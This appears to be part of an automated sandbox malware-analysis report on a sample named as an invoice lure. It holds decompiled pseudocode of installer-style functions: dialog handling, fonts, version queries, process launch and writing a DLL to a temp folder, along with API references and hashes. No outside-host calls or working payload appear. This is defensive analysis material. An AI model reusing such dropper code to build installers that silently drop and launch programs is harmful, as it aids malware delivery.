				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
				GetClientRect(_t25, _t27 - 0x40);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029F6(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}

0x00401ccb
0x00401cd2
0x00401d01
0x00401d09
0x00401d10
0x00401d10
0x0040288e
0x0040289a

APIs

GetDlgItem.USER32 ref: 00401CC5
GetClientRect.USER32 ref: 00401CD2
LoadImageA.USER32 ref: 00401CF3
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
DeleteObject.GDI32(00000000), ref: 00401D10

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 70cca8153c69b2e132429069c22b9ddf05dbb7ba62a9a7cfa9b79a9bcebcea9b
Instruction ID: de7316f9b9f1bcc3f0c1dff9ae5dc63c91f1472c52c052d8cf8a0da7f27950be
Opcode Fuzzy Hash: 70cca8153c69b2e132429069c22b9ddf05dbb7ba62a9a7cfa9b79a9bcebcea9b
Instruction Fuzzy Hash: D5F01DB2E04105BFD700EFA4EE89DAFB7BDEB44345B104576F602F2190C6789D018B69

Uniqueness

Uniqueness Score: -1.00%

Function 004046F1, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78
stringCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E004046F1(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E00405B88(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E00405B88(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E00405B88(_t34, 0, 0x4204a0, 0x4204a0, _a8);
				wsprintfA(_t26 + lstrlenA(0x4204a0), "%u.%u%s%s");
				return SetDlgItemTextA( *0x423678, _a4, 0x4204a0);
			}

0x004046f9
0x004046fd
0x00404705
0x00404708
0x00404709
0x0040470b
0x0040470d
0x00404710
0x00404710
0x00404717
0x0040471d
0x0040471d
0x00404724
0x0040472f
0x00404730
0x00404733
0x00404733
0x00404740
0x0040474b
0x0040474e
0x00404760
0x00404767
0x00404768
0x00404777
0x00404787
0x004047a3

APIs

lstrlenA.KERNEL32(004204A0,004204A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404611,000000DF,0000040F,00000400,00000000), ref: 0040477F
wsprintfA.USER32 ref: 00404787
SetDlgItemTextA.USER32 ref: 0040479A

Strings

%u.%u%s%s, xrefs: 00404769

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 900e3a4788bbcdb5831f4eb4ea085b1ecc54347093cfae2cf180548b061950ae
Instruction ID: e1128f73888b2767c9277aed1687fd20c93e739cc52df1aac9c0a45a5a8dde9d
Opcode Fuzzy Hash: 900e3a4788bbcdb5831f4eb4ea085b1ecc54347093cfae2cf180548b061950ae
Instruction Fuzzy Hash: 7311E2736001243BDB10666D9C46EEF3699DBC6335F14423BFA25F61D1E938AC5286A8

Uniqueness

Uniqueness Score: -1.00%

Function 00401BAD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00401BAD() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 0x34) = E004029D9(3);
				 *(_t55 + 8) = E004029D9(4);
				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x34)) = E004029F6(0x33);
				}
				__eflags =  *(_t55 - 0x10) & 0x00000002;
				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
					 *(_t55 + 8) = E004029F6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E004029F6();
					_t28 = E004029F6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E004029D9();
					_t37 = E004029D9();
					_t48 =  *(_t55 - 0x10) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
						L10:
						 *(_t55 - 8) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
					_push( *(_t55 - 8));
					E00405AC4();
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}

0x00401bb6
0x00401bc2
0x00401bc5
0x00401bce
0x00401bce
0x00401bd1
0x00401bd5
0x00401bde
0x00401bde
0x00401be1
0x00401be5
0x00401be7
0x00401c34
0x00401c36
0x00401c3f
0x00401c47
0x00401c4a
0x00401c4a
0x00401c53
0x00000000
0x00401be9
0x00401bf0
0x00401bf2
0x00401bfa
0x00401bfd
0x00401c25
0x00401c59
0x00401c59
0x00401bff
0x00401c0d
0x00401c15
0x00401c18
0x00401c18
0x00401bfd
0x00401c5c
0x00401c5f
0x00401c65
0x00402833
0x00402833
0x0040288e
0x0040289a

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25

Strings

!, xrefs: 00401BE1

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 4c88f05d798f5705ce1e1e18451d2fcf653d7f56610e9d44bad61831beeb824c
Instruction ID: 67abd366a37910a3fb0c7fe19d632a25016d3899897cc5a5bd850e91adcb6683
Opcode Fuzzy Hash: 4c88f05d798f5705ce1e1e18451d2fcf653d7f56610e9d44bad61831beeb824c
Instruction Fuzzy Hash: B721C4B1A44209BFEF01AFB4CE4AAAE7B75EF44344F14053EF602B60D1D6B84980E718

Uniqueness

Uniqueness Score: -1.00%

Function 004053C6, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004053C6(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x4224a8->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x4224a8,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x004053cf
0x004053eb
0x004053f3
0x004053f8
0x00000000
0x004053fe
0x00405402

APIs

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004224A8,Error launching installer), ref: 004053EB
CloseHandle.KERNEL32(?), ref: 004053F8

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004053C6
Error launching installer, xrefs: 004053D9

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
API String ID: 3712363035-1785902839
Opcode ID: 3b814a6f076d0ba9038e170a1e0f3647fdefee354992cb10a65e7e77ca0a2381
Instruction ID: 069b69ca15cd8b990da55ccc95fe3be7356009797bdfa18ab8f6d6c8c96e71ef
Opcode Fuzzy Hash: 3b814a6f076d0ba9038e170a1e0f3647fdefee354992cb10a65e7e77ca0a2381
Instruction Fuzzy Hash: A3E0ECB4A00219BFDB00AF64ED49AAB7BBDEB00305F90C522A911E2150D775D8118AB9

Uniqueness

Uniqueness Score: -1.00%

Function 00405659, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405659(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}

0x0040565a
0x00405671
0x00405679
0x00405679
0x00405681

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403226,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 0040565F
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403226,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405668
lstrcatA.KERNEL32(?,00409010), ref: 00405679

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405659

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3081826266
Opcode ID: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
Instruction ID: d5422d5486d5b384c4dcc02911800b35c31fcf4388d9dde419d5dff5703c7688
Opcode Fuzzy Hash: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
Instruction Fuzzy Hash: 8BD05272605A202ED2022A258C05E9B7A28CF06311B044866B540B2292C6386D818AEE

Uniqueness

Uniqueness Score: -1.00%

Function 00401EC5, Relevance: 6.1, APIs: 4, Instructions: 54
memoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00401EC5(char __ebx, char* __edi, char* __esi) {
				char* _t18;
				int _t19;
				void* _t30;

				_t18 = E004029F6(0xffffffee);
				 *(_t30 - 0x2c) = _t18;
				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
				 *__esi = __ebx;
				 *(_t30 - 8) = _t19;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t30 - 4)) = 1;
				if(_t19 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp + 8) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp - 0x34;
							if(VerQueryValueA( *(__ebp + 8), 0x409010, __ebp - 0x34, __ebp - 0x44) != 0) {
								 *(__ebp - 0x34) = E00405AC4(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
								 *(__ebp - 0x34) = E00405AC4(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp + 8));
						GlobalFree();
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}

0x00401ec7
0x00401ecf
0x00401ed4
0x00401ed9
0x00401edd
0x00401ee0
0x00401ee2
0x00401ee9
0x00401ef2
0x00401efa
0x00401efd
0x00401f12
0x00401f18
0x00401f2b
0x00401f34
0x00401f40
0x00401f45
0x00401f45
0x00401f2b
0x00401f48
0x00401b75
0x00401b75
0x00401efd
0x0040288e
0x0040289a

APIs

GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401F24

Part of subcall function 00405AC4: wsprintfA.USER32 ref: 00405AD1

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
String ID:
API String ID: 1404258612-0
Opcode ID: be50ba22476c795dccddfbd46c0b19e6aec7ed87346bdfd2eed6167faf837e67
Instruction ID: 178fa6cf4330108057832d0c189c0e5a27020503733a18e797ef1cc5e9d7aef6
Opcode Fuzzy Hash: be50ba22476c795dccddfbd46c0b19e6aec7ed87346bdfd2eed6167faf837e67
Instruction Fuzzy Hash: 52113A71A00108BEDB01EFA5DD819AEBBB9EB48344B20853AF501F61E1D7389A54DB28

Uniqueness

Uniqueness Score: -1.00%

Function 00401D1B, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00401D1B() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
				0x40af74->lfHeight =  ~(MulDiv(E004029D9(2), _t6, 0x48));
				 *0x40af84 = E004029D9(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x40af8b = 1;
				 *0x40af88 = _t11 & 0x00000001;
				 *0x40af89 = _t11 & 0x00000002;
				 *0x40af8a = _t11 & 0x00000004;
				E00405B88(_t18, _t24, _t26, 0x40af90,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x40af74);
				_push(_t14);
				_push(_t26);
				E00405AC4();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}

0x00401d29
0x00401d42
0x00401d4c
0x00401d51
0x00401d5c
0x00401d63
0x00401d75
0x00401d7b
0x00401d80
0x00401d8a
0x004024b8
0x00401561
0x00402833
0x0040288e
0x0040289a

APIs

GetDC.USER32(?), ref: 00401D22
GetDeviceCaps.GDI32(00000000), ref: 00401D29
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
CreateFontIndirectA.GDI32(0040AF74), ref: 00401D8A

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirect
String ID:
API String ID: 3272661963-0
Opcode ID: 2c6a9fd6684e48c72e8170f31dde3613139c4976fc228405473ba1f45ca6ba00
Instruction ID: d83410998d1654a5337f8c322709d39cf2ce3a8a4f0330bc6585c9693e616625
Opcode Fuzzy Hash: 2c6a9fd6684e48c72e8170f31dde3613139c4976fc228405473ba1f45ca6ba00
Instruction Fuzzy Hash: E1F044F1A45342AEE7016770AE0ABA93B649725306F100576F541BA1E2C5BC10149B7F

Uniqueness

Uniqueness Score: -1.00%

Function 00403978, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403978(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405ADD(__ecx, "1033");
				while(1) {
					_t26 =  *0x423ee4;
					if(_t26 == 0) {
						goto L7;
					}
					_t16 =  *( *0x423eb0 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423ee0;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423680 = _t18[1];
					 *0x423f48 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42367c = _t23;
						E00405AC4(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420478, E00405B88(_t13, _t24, _t26, 0x4236a0, 0xfffffffe));
						_t11 =  *0x423ecc;
						_t27 =  *0x423ec8;
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t11 = E00405B88(_t13, _t25, _t27, _t27 + 0x18, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

0x0040397c
0x00403981
0x00403987
0x0040398c
0x0040398c
0x00403994
0x00000000
0x00000000
0x0040399c
0x004039a4
0x004039a6
0x004039ac
0x004039ac
0x004039ae
0x004039ba
0x00000000
0x00000000
0x004039be
0x00000000
0x00000000
0x00000000
0x004039c0
0x004039c5
0x004039ce
0x004039d4
0x004039d9
0x004039ed
0x004039f8
0x00403a10
0x00403a16
0x00403a1b
0x00403a23
0x00403a44
0x00403a44
0x00403a44
0x00403a25
0x00403a27
0x00403a27
0x00403a2b
0x00403a32
0x00403a32
0x00403a37
0x00403a3d
0x00403a3d
0x00000000
0x00403a27
0x004039db
0x004039e0
0x004039e9
0x004039e2
0x004039e2
0x004039e2
0x004039e0

APIs

SetWindowTextA.USER32(00000000,004236A0), ref: 00403A10

Strings

1033, xrefs: 0040397C, 00403986, 004039F7
C:\Users\user\AppData\Local\Temp\, xrefs: 00403979

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: TextWindow
String ID: 1033$C:\Users\user\AppData\Local\Temp\
API String ID: 530164218-517883005
Opcode ID: defed7287a9455a29b24b67e45bb8aa9d1031aed7a359321573c6b72916d69ed
Instruction ID: 09623374405f0611f065d620c03919b516a5f167df25bc0d5edc66fe9dc562c0
Opcode Fuzzy Hash: defed7287a9455a29b24b67e45bb8aa9d1031aed7a359321573c6b72916d69ed
Instruction Fuzzy Hash: F611C2B1B005109BC730DF15D880A73767DEB84716369413BE94167391C77EAE028E58

Uniqueness

Uniqueness Score: -1.00%

Function 00404E54, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404E54(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420488 != _t22) {
							 *0x420488 = _t22;
							E00405B66(0x4204a0, 0x424000);
							E00405AC4(0x424000, _t22);
							E0040140B(6);
							E00405B66(0x424000, 0x4204a0);
						}
						L11:
						return CallWindowProcA( *0x420490, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E004047D3(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403F64(0x413);
				return 0;
			}

0x00404e60
0x00404e85
0x00404ea5
0x00404ea8
0x00404eab
0x00404ec2
0x00404ec8
0x00404ecf
0x00404ed6
0x00404edd
0x00404ee2
0x00404ee8
0x00000000
0x00404ef8
0x00404e92
0x00404ee5
0x00404ee5
0x00000000
0x00404ee5
0x00404e9e
0x00404ea0
0x00000000
0x00404ea0
0x00404e66
0x00000000
0x00000000
0x00404e6d
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 00404E8A
CallWindowProcA.USER32 ref: 00404EF8

Part of subcall function 00403F64: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403F76

Strings

, xrefs: 00404E62

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 1a28ca64547386e1a64dd11c64f6ae458e1df03769ff3acb3952d776ac0a4b66
Instruction ID: 62f3a1a08e098275047049d4f9968a6b4933f6b7f921e7009373277d82a30415
Opcode Fuzzy Hash: 1a28ca64547386e1a64dd11c64f6ae458e1df03769ff3acb3952d776ac0a4b66
Instruction Fuzzy Hash: D1116D71900208BBDB21AF52DC4499B3669FB84369F00803BF6047A2E2C37C5A519BAD

Uniqueness

Uniqueness Score: -1.00%

Function 004024BE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34
filestringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004024BE(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E004029F6(0x11));
				} else {
					E004029D9(1);
					 *0x409f70 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405ADD(_t17 + 8, _t15), "C:\Users\jones\AppData\Local\Temp\nsp24F7.tmp\System.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}

0x004024be
0x004024be
0x004024c1
0x004024dc
0x004024c3
0x004024c5
0x004024ca
0x004024d1
0x004024e3
0x0040265c
0x0040265c
0x004024e9
0x004024fb
0x004015a6
0x004015a8
0x00000000
0x004015ae
0x004015a8
0x0040288e
0x0040289a

APIs

lstrlenA.KERNEL32(00000000,00000011), ref: 004024DC
WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsp24F7.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 004024FB

Strings

C:\Users\user\AppData\Local\Temp\nsp24F7.tmp\System.dll, xrefs: 004024CA, 004024EF

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: FileWritelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsp24F7.tmp\System.dll
API String ID: 427699356-2791705483
Opcode ID: 02a15bd42c28bed1fb8554f3d16374f042fc662dbffd218bbabce7ee12e12458
Instruction ID: 2c1f07a632d72534084a5ac00d75746702f795d1104bf50e8da4b719a2e94720
